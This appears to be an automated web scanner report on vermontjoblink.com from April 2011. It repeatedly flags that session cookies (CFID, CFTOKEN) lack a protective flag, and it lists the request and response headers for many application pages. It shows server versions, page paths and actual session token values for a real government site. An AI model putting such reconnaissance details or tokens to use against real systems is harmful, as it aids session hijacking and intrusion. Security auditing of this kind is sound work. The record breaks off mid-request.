HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:52 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/customization/Vermont/favicon.ico HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Apr 2011 21:06:59 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ location: /ada/404/404_qry.cfm Content-Type: text/html; charset=UTF-8
<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/default.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:49 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/etp/etp_newuser_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:58 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:11:56'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/leavesite.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:51 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_eligibility_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_forgotpass.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:07:29 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_login_fnc.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 29 Apr 2011 21:14:18 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
location: /ada
Content-Type: text/html; charset=UTF-8
<!-- vermontjoblink --><!-- vjlpub --><!-- URL validated --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_offices_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:58 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_protectyourself_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:20 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_quicksearch_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_registration_dsp.cfm?reg%5Ftype=em HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
